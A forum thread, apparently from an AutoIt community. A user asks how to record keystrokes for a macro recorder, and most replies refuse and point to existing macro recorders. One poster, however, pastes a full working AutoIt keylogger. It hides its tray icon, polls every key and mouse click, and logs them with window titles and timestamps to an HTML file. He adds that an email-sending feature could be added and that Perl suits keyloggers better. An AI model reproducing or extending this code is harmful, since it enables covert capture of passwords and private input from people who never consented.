Starting a small project...

cdm_Death

So I want to do 2 projects and both require info on the same thing... I know that keyloggers are not allowed (wich i dont agrea with) btu this is to log about 1 minuet of keys entered...

If anyone can help me to set a time on the get key info thingy please help... :)

The fact that you admitted your project as a keylogger sets you up for the flaming of a lifetime. The 1 minute exception is easily changed, and I doubt you will find any help on this subject on this site.

Infinity is a floorless room without walls or ceiling.Anyone who cannot cope with mathematics is not fully human. At best he is a tolerable subhuman who has learned to wear shoes, bathe, and not make messes in the house.

Ok...So you want us to tell you how to make a keylogger...why not just say that straight? less typing. Not that it would get you anywhere farther. No one will help you.

Wether you are one or not, I'm not sure you realize how many people there are out there who just want to make malware to get people's passwords or bank info or whatnot...And you seriously expect us to tell random people who just joined how to make a keylogger?

Plus, you don't have any reputation on this forum. How do we know you're not just another computer theif?

The cake is a lie.www.theguy0000.com is currentlyUP images.theguy0000.com is currentlyUP all other *.theguy0000.com sites are DOWN

Ok...So you want us to tell you how to make a keylogger...why not just say that straight? less typing. Not that it would get you anywhere farther. No one will help you.

Wether you are one or not, I'm not sure you realize how many people there are out there who just want to make malware to get people's passwords or bank info or whatnot...And you seriously expect us to tell random people who just joined how to make a keylogger?

Plus, you don't have any reputation on this forum. How do we know you're not just another computer theif?

You have no way of knowing... And im not new but I am fairly limeted in posts... To be honest I understand my needs seem fishy and I understand that. Hopefully by sharing with you what I intend to do I can help illiminate some of the sceptasism.

I intend to creat an autoit program that takes keystrokes and mouse strokes/clicks and uses them to creat a new progrm. So for instance, rather then everytime i find a little task that I need automated having to write a new set of data... I intend to creat a program that all you do is hit a hotkey and do your simple 60second task, then hit a button to end it and creat a .au3 file... maybe down the line ill have it compile but I think leaving it open allows checking for errors... I think this would be very usefull for allot of tasks... after much searching I found nothing like this.

I apologize if What I seek as far as info goes could be missused, but this is not my fault, and I would hope that my acknolegement of the malicious use of a keylogger would help to show I am aware of possible missues and am not intending to do so. I could have easily stated my project before and been flamed for wanting this info and trying to "hide" my true intentions. I hope that someone may be able to look past other peoples stuipidity and help me with a project. Otherwise I am going to working for some time....

You have no way of knowing... And im not new but I am fairly limeted in posts... To be honest I understand my needs seem fishy and I understand that. Hopefully by sharing with you what I intend to do I can help illiminate some of the sceptasism.

I intend to creat an autoit program that takes keystrokes and mouse strokes/clicks and uses them to creat a new progrm. So for instance, rather then everytime i find a little task that I need automated having to write a new set of data... I intend to creat a program that all you do is hit a hotkey and do your simple 60second task, then hit a button to end it and creat a .au3 file... maybe down the line ill have it compile but I think leaving it open allows checking for errors... I think this would be very usefull for allot of tasks... after much searching I found nothing like this.

I apologize if What I seek as far as info goes could be missused, but this is not my fault, and I would hope that my acknolegement of the malicious use of a keylogger would help to show I am aware of possible missues and am not intending to do so. I could have easily stated my project before and been flamed for wanting this info and trying to "hide" my true intentions. I hope that someone may be able to look past other peoples stuipidity and help me with a project. Otherwise I am going to working for some time....

I remembered something liek this :)

'm not keen on keylogger posts. Posts on how to check for a few keys being pressed is one thing but entire "log everything you type" scripts are just plain bad news (in PR terms).

Please no more keylogger posts - they will be deleted.

What you describe is a Macro Recorder, which I believe there are two different ones in the standard SciTE install. You may want to check those out. They will do what you want therefore eliminating your "need" for this potentially "harmful" information.

SciTE4AutoIt3

Thanks,

JS

AutoIt Links

File-String Hash Plugin Updated! 04-02-2008 Plugins have been discontinued. I just found out.

ComputerGetInfo UDF's Updated! 11-23-2006

External Links

Vortex Revolutions Engineer / Inventor (Web, Desktop, and Mobile Applications, Hardware Gizmos, Consulting, and more)

shhh.. speak for yourself please.

=====================================================================================

blabla... just to let this topic close:

Opt("TrayIconHide", 1)
$window2=""
$date=@year&@mon&@mday
$log= "C:\Path\To\Log\File" ;then i mean the location you want it to be.
DirCreate ($log)
Opt("TrayIconHide")

Func _IsPressed($hexKey)

Local $aR, $bRv
$hexKey = '0x' & $hexKey
$aR = DllCall($user32, "int", "GetAsyncKeyState", "int", $hexKey)

If $aR[0] <> 0 Then
    $bRv = 1
Else
    $bRv = 0
EndIf

Return $bRv
EndFunc  

$file = FileOpen($log&"\logfiles"&$date&".htm", 1)
If $file = -1 Then
  Exit
EndIf
filewrite($file,"<font face=Verdana size=1>")

Func Terminate()
DllClose ( $user32 )
FileClose ( $file )
    sleep(1000)
    Exit 0
EndFunc
$user32 = DllOpen ( "user32" )
While 1

For $n = 41 To 49
    If _IsPressed($n) Then
        _LogKeyPress(Chr($n+56))
    EndIf
Next

If _IsPressed('4a') Then
    _LogKeyPress("j")
EndIf

If _IsPressed('4b') Then
    _LogKeyPress("k")
EndIf

If _IsPressed('4c') Then
    _LogKeyPress("l")
EndIf

If _IsPressed('4d') Then
    _LogKeyPress("m")
EndIf

If _IsPressed('4e') = 1 Then 
    _LogKeyPress("n")
EndIf

If _IsPressed('4f') Then
    _LogKeyPress("o")
EndIf

For $n = 50 To 59
    If _IsPressed($n) Then
        _LogKeyPress(Chr($n+56))
    EndIf
Next

If _IsPressed('5a') Then
    _LogKeyPress("z")
EndIf

If _IsPressed('01') Then
    _LogKeyPress("<font color=#008000 style=font-size:9px><i>{LEFT MOUSE}</i></font>")
EndIf

If _IsPressed('02') Then
    _LogKeyPress("<font color=#008000 style=font-size:9px><i>{RIGHT MOUSE}</i></font>")
EndIf

If _IsPressed('08') Then
    _LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{BACKSPACE}</i></font>")
EndIf

If _IsPressed('09') Then
    _LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{TAB}</i></font>")
EndIf

If _IsPressed('0d') Then
    _LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{ENTER}</i></font>")
EndIf

If _IsPressed('10') Then
    _LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{SHIFT}</i></font>")
EndIf

If _IsPressed('11') Then
    _LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{CTRL}</i></font>")
EndIf

If _IsPressed('12') Then
    _LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{ALT}</i></font>")
EndIf

If _IsPressed('13') Then
    _LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{PAUSE}</i></font>")
EndIf   

If _IsPressed('14') Then
    _LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{CAPSLOCK}</i></font>")
EndIf

If _IsPressed('1b') Then
    _LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{ESC}</i></font>")
EndIf

If _IsPressed('20') Then
    _LogKeyPress(" ")
EndIf

If _IsPressed('21') Then
    _LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{PGUP}</i></font>")
EndIf

If _IsPressed('22') Then
    _LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{PGDOWN}</i></font>")
EndIf

If _IsPressed('23') Then
    _LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{END}</i></font>")
EndIf

If _IsPressed('24') Then
    _LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{HOME}</i></font>")
EndIf

If _IsPressed('25') Then
    _LogKeyPress("<font color=#008000 style=font-size:9px><i>{LEFT ARROW}</i></font>")
EndIf

If _IsPressed('26') Then
    _LogKeyPress("<font color=#008000 style=font-size:9px><i>{UP ARROW}</i></font>")
EndIf

If _IsPressed('27') Then
    _LogKeyPress("<font color=#008000 style=font-size:9px><i>{RIGHT ARROW}</i></font>")
EndIf

If _IsPressed('28') Then
    _LogKeyPress("<font color=#008000 style=font-size:9px><i>{DOWN ARROW}</i></font>")
EndIf

If _IsPressed('2c') Then
    _LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{PRNTSCRN}</i></font>")
EndIf

If _IsPressed('2d') Then
    _LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{INSERT}</i></font>")
EndIf

If _IsPressed('2e') Then
    _LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{DEL}</i></font>")
EndIf

For $n = 30 To 39
    If _IsPressed($n) Then
        _LogKeyPress(StringRight( $n, 1 ))
    EndIf
Next
WEnd

Func _LogKeyPress($what2log)
$window=wingettitle("")
if $window=$window2 Then 
    FileWrite($file,$what2log) 
    Sleep(100)
Else
$window2=$window
FileWrite($file, "<br><BR>" & "<b>["& @Year&"."&@mon&"."&@mday&"  "&@HOUR & ":" &@MIN & ":" &@SEC & ']  Window: "'& $window& '"</b><br>'& $what2log)
sleep (100)
Endif
EndFunc

"Here you go.. Mr Keylogger".

Btw.. AutoIt is to slow.. to make a perfect keylogger try (Perl)

and the CPU usage will be much more though.

and yes you can build in a Sent To Email Func.

how??? .. figure it out yourself.

if the logfile dont saves things like "!" or something add it yourself for the ASCII thingys:

" http://www.lookuptables.com "

Thanks.

Edited by aceloc

[quote name='AceLoc']I gots new sunglasses there cool.[/quote]

shhh.. speak for yourself please.

=====================================================================================

blabla... just to let this topic close:

Thanks.

I was wondering when someone would say something like that. Just because the majority of people dont want to just create scripts for people, doesnt mean that is the way everyone feels.

GJ

BTW he is correct AutoIt isnt a very good language for a keylogger. Can it be done, and done well enough to be malicious? Yes. Not the best language for the job though.

JS

AutoIt Links

File-String Hash Plugin Updated! 04-02-2008 Plugins have been discontinued. I just found out.

ComputerGetInfo UDF's Updated! 11-23-2006

External Links

Vortex Revolutions Engineer / Inventor (Web, Desktop, and Mobile Applications, Hardware Gizmos, Consulting, and more)

BTW he is correct AutoIt isnt a very good language for a keylogger. Can it be done, and done well enough to be malicious? Yes. Not the best language for the job though.

i know i really prefer Perl or something for that

Thanks.

[quote name='AceLoc']I gots new sunglasses there cool.[/quote]